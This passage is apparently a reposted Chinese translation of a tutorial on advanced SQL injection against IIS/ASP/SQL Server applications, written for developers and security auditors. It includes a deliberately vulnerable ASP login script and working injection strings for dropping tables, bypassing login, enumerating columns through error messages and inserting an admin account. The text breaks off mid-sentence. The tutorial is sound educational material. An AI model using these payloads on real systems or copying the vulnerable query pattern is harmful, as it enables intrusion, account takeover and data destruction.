SQLServer应用程序的高级Sql注入

2024-07-21 02:46:39

字体：大中小

来源：转载

供稿：网友

　　这篇文章讨论常用的"sql注入"技术的细节，应用于流行的MsIIS/asp/SQL-Server平台。这里探讨有关这种攻击各种可以注入程序访问数据和数据库防范的方法。这篇文章面向两种读者：一是基于数据库web程序开发人员和审核各种web程序的安全专家。

　　[介绍]

　　结构化查询语言（SQL）是一种用来和数据库交互的文本语言SQL语言多种多样，大多的方言版本都共同宽松地遵循SQL-92标准（最新的ANSI标准[译者注：目前最新的是SQL-99]）。SQL运行的典型的操作是“查询”，它是可以让数据库返回“查询结果记录集”的语句集合。SQL语句可以修改数据库的结构（用数据定义语言"DDL"）和操作数据库里的数据（用数据操作语言"DML"）。我们在这里着重讨论Transact-SQL（交互式SQL），应用于SQL-Server的SQL一种方言（非标准SQL）。如果攻击者可以插一系列的SQL语句进入应用程序的数据查询时，Sql注入攻击就可能发生。

　　一个典型的SQL语句是这样的：

　1 　select id， forename， surname from authors

　　这个查询语句将会从'authors'表中返回'id'，'forename'和'surname'列的所有行。返回的结果集也可以加以特定条件'author'限制：

　select id， forename， surname from authors where forename = 'john' and surname = 'smith'

　　注意这里很重要的一点是'john'和'smith'是被单引号引住的，假设'forename'和'surname'字段是来自于用户的输入，攻击者就可能通过输入非法字符串来对这个查询进行SQL注入：

Forename：jo'hn　　Surname： smith

　　查询语句就会变成：

1 select id， forename， surname from authors where forename = 'jo'hn' and surname = 'smith'

　　当数据库试图执行这个查询，它会返回这样的错误：

1 　　Server：Msg 170， Level 15， State 1， Line 12 3 　　Line 1：Incorrect syntax near 'hn'

　　这是因为插入的单引号破坏了原来单引号引住的数据，数据库执行到'hn'时失败。如果攻击者这样输入：

　　Forename：jo'；droptableauthors——

　　Surname：

　　……authors表就会被删掉，原因过一会再解释。

　　似乎通过删除用户输入的字符串中的单引号或者通过一些方法避免它们出现可以解决这个问题。诚然如此，但是要实施这个解决方法还有很多的困难。因为首先：不是所有的用户提交的数据都是字符串形式，比如我们的用户输入通过'id'（看上去是个数字）来选择一个用户，我们的查询可能会这样：

　　selectid，forename，surnamefromauthorswhereid=1234

　　在这种情况下攻击者可以轻易的在数值输入后面添加SQL语句。在其他SQL方言中，使用着各种分隔符，比如MSJetDBMS引擎，日期可以用'#'符号来分隔。

　　其次，避免单引号并不像开始我们想象的那样是必要的解决办法，原因下面讨论。

　　我们将以ActiveServerPages（ASP）登陆页面为例子来详细说明，它访问一个Sql-Server数据库并且验证一个到我们假想的程序的访问。

　　这是用户填写用户名和密码的表单页面：

　　〈HTML〉〈HEAD〉〈TITLE〉LoginPage〈/TITLE〉〈/HEAD〉〈BODYbgcolor='000000'text='cccccc'〉〈FONTFace='tahoma'color='cccccc'〉〈CENTER〉〈H1〉Login〈/H1〉〈FORMaction='PRocess_login.asp'method=post〉〈TABLE〉〈TR〉〈TD〉Username:〈/TD〉〈TD〉〈INPUTtype=textname=usernamesize=100%width=100〉〈/INPUT〉〈/TD〉〈/TR〉〈TR〉〈TD〉PassWord:〈/TD〉〈TD〉〈INPUTtype=passwordname=passwordsize=100%width=100〉〈/INPUT〉〈/TD〉〈/TR〉〈/TABLE〉〈INPUTtype=submitvalue='Submit'〉〈INPUTtype=resetvalue='Reset'〉〈/FORM〉〈/FONT〉〈/BODY〉〈/HTML〉

　　这是'process_login.asp'的代码,它处理用户登陆：

　　〈HTML〉〈BODYbgcolor='000000'text='ffffff'〉〈FONTFace='tahoma'color='ffffff'〉〈STYLE〉p{font-size=20pt!important}font{font-size=20pt!important}h1{font-size=64pt!important}〈/STYLE〉

　　〈%@LANGUAGE=JScript%〉〈%functiontrace(str){if(Request.form("debug")=="true")Response.write(str);}functionLogin(cn){varusername;varpassword;username=Request.form("username");password=Request.form("password");varrso=Server.CreateObject("ADODB.Recordset");varsql="select*fromuserswhereusername='"+username+"'andpassword='"+password+"'";trace("query:"+sql);rso.open(sql,cn);if(rso.EOF){rso.close();%〉〈FONTFace='tahoma'color='cc0000'〉〈H1〉〈BR〉〈BR〉〈CENTER〉accessDENIED〈/CENTER〉〈/H1〉〈/BODY〉〈/HTML〉〈%Response.endreturn;}else{session("username")=""+rso("username");%〉〈FONTFace='tahoma'color='00cc00'〉〈H1〉〈CENTER〉ACCESSGRANTED〈BR〉〈BR〉Welcome,〈%Response.write(rso("Username"));Response.write("〈/BODY〉〈/HTML〉");Response.end}}functionMain(){//Setupconnectionvarusernamevarcn=Server.createobject("ADODB.Connection");nnectiontimeout=20;cn.open("localserver","sa","password");username=newString(Request.form("username"));if(username.length〉0){Login(cn);}cn.close();}Main();%〉

　　这里讨论的是'process_login.asp'中的创建'querystring'的部分：

　　varsql="select*fromuserswhereusername='"+username+"'andpassword='"+password+"'"；

　　如果用户指定了下面这样的数据：

　　Username：'；droptableusers——Password：

　　'users'表会被删除，所有用户都不能登陆。'——'是Transact-SQL（交互式SQL）的单行注释符，'；'标志着一个查询的结束另一个查询的开始。用户名最后的'——'用来使这个特殊的查询无错误结束。

　　攻击者只要知道用户名，就可以通过以下的输入以任何用户的身份登陆：

　　Username：admin'——

　　攻击者可以通过下面的输入以用户表里的第一个用户来登陆：

　　Username：'or1=1——

　　……更有甚者，攻击者通过以下的输入可以以任意虚构的用户登陆：

　　Username：'unionselect1，'fictional_user'，'somoe_password'，1——

　　因为程序相信攻击者指定的常量是数据库返回的记录集的一部分。

　　[通过错误信息获取信息]

　　这个技术是DavidLitchfield在一次渗透入侵测试中首先发现的，后来david写了篇关于这个技术的文章，很多作者都参考过这篇作品。这里我们讨论“错误消息”技术潜在的机制，使读者可以充分理解它并且能灵活应用。

　　为了操作数据库里的数据，攻击者要确定某个数据库的结构。例如：我们的"user"表是用下面的语句建立的：

　　createtableusers（idint，

　　usernamevarchar（255），

　　passwordvarchar（255），

　　privsint

　　）

　　并且插入了下面的用户：

　　insertintousersvalues（0，'admin'，'r00tr0x！'，0xffff）

　　insertintousersvalues（0，'guest'，'guest'，0x0000）

　　insertintousersvalues（0，'chris'，'password'，0x00ff）

　　insertintousersvalues（0，'fred'，'sesame'，0x00ff）

　　我们假设攻击者要为自己插入一个用户，如果不知道表的结构的话，他不可能成功。即使他运气好，'priv'字段的重要性还不清楚。攻击者可能插入'1'，给自己在程序里添加了一个低权限的用户，而他的目标是管理员的权限。

　　对于攻击者来说幸运的是：如果程序返回错误（asp默认如此），攻击者可以猜测整个数据库的结构，读取ASP程序连接到SQL-Server的帐号权限内可以读取的任何值。

　　（下面给出的使用上面提供的示例数据库和asp脚本来说明这些技术怎样实现的）

　　首先，攻击者要确定查询的表名和字段名。要做到这点，攻击者可以使用'select'语句的'having'子句：

　　username：'having1=1——

　　这会引起下面的错误（译者注：having字句必须和GROUPBY或者聚合函数一起配合使用，否则出错）：

　　MicrosoftOLEDBProviderforODBCDriverserror'80040e14'

　　[Microsoft][ODBCSQLServerDriver][SQLServer]Column'users.id'is

　　invalidintheselectlistbecauseitisnotcontainedinanaggregate

　　functionandthereisnoGROUPBYclause.

　　/process_login.asp，line35

　　所以攻击者就知道了表名和第一列的列名，他们可以通过给每列加上'groupby'子句继续得到其他列名，如下：

　　username：'groupbyusers.idhaving1=1——

　　（结果产生这样的错误）

　　MicrosoftOLEDBProviderforODBCDriverserror'80040e14'

　　[Microsoft][ODBCSQLServerDriver][SQLServer]Column'users.username'

　　isinvalidintheselectlistbecauseitisnotcontainedineitheran

　　aggregatefunctionortheGROUPBYclause.

　　/process_login.asp，line35

　　最后攻击者得到了下面的'username'：

　　'groupbyusers.id，users.username，users.password，users.privshaving1=1——

　　这句没有错误，相当于：

　　select*fromuserswhereusername=''

　　所以攻击者知道了查询只是关于'users'表的，并且顺序使用了列'id，username，password，rpivs'.

　　如果攻击者能确定各列的数据类型将会很有用，可以利用类型转换错误信息来达到这一点，看下面的例子：

　　Username：'unionselectsum（username）fromusers——

　　这利用了SQL-Server试图在确定两行是否相同之前先执行'sum'子句的特性，计算文本域的和会返回这样的信息：

　　MicrosoftOLEDBProviderforODBCDriverserror'80040e07'[Microsoft][ODBCSQLServerDriver][SQLServer]ThesumoraverageaggregateOperationcannottakeavarchardatatypeasanargument./process_login.asp，line35

　　它告诉我们'username'字段的类型是'varchar'.相反的，如果我们试图计算数值型的字段，但结果两行的列数并不匹配：

　　MicrosoftOLEDBProviderforODBCDriverserror'80040e07'

　　[Microsoft][ODBCSQLServerDriver][SQLServer]Thesumoraverage

　　aggregateoperationcannottakeavarchardatatypeasanargument.

　　/process_login.asp，line35

　　我们可以用这个技术来大概地确定数据库内各列的类型。

　　这样攻击者就可以写出一个格式完美的'insert'语句：

　　Username：'；insertintousersvalues（666，'attacker'，'foobar'，0xffff）——

　　但是，这个技术的潜力不止这些。攻击者可以利用任何错误信息来暴露系统环境或者数据库信息。执行下面的语句可以得到一个标准错误信息的清单：

　　select*frommaster……sysmessages

　　检查这个清单可以发现很多有趣的信息。

　　一个特别有用的信息有关类型转换，如果你试图将一个字符串转换成整型，整个字符串的内容将会出现在错误信息里。以我们登陆页的例子来说，使用下面的'username'将会返回SQL-Server的版本以及它所在服务器操作系统的版本信息：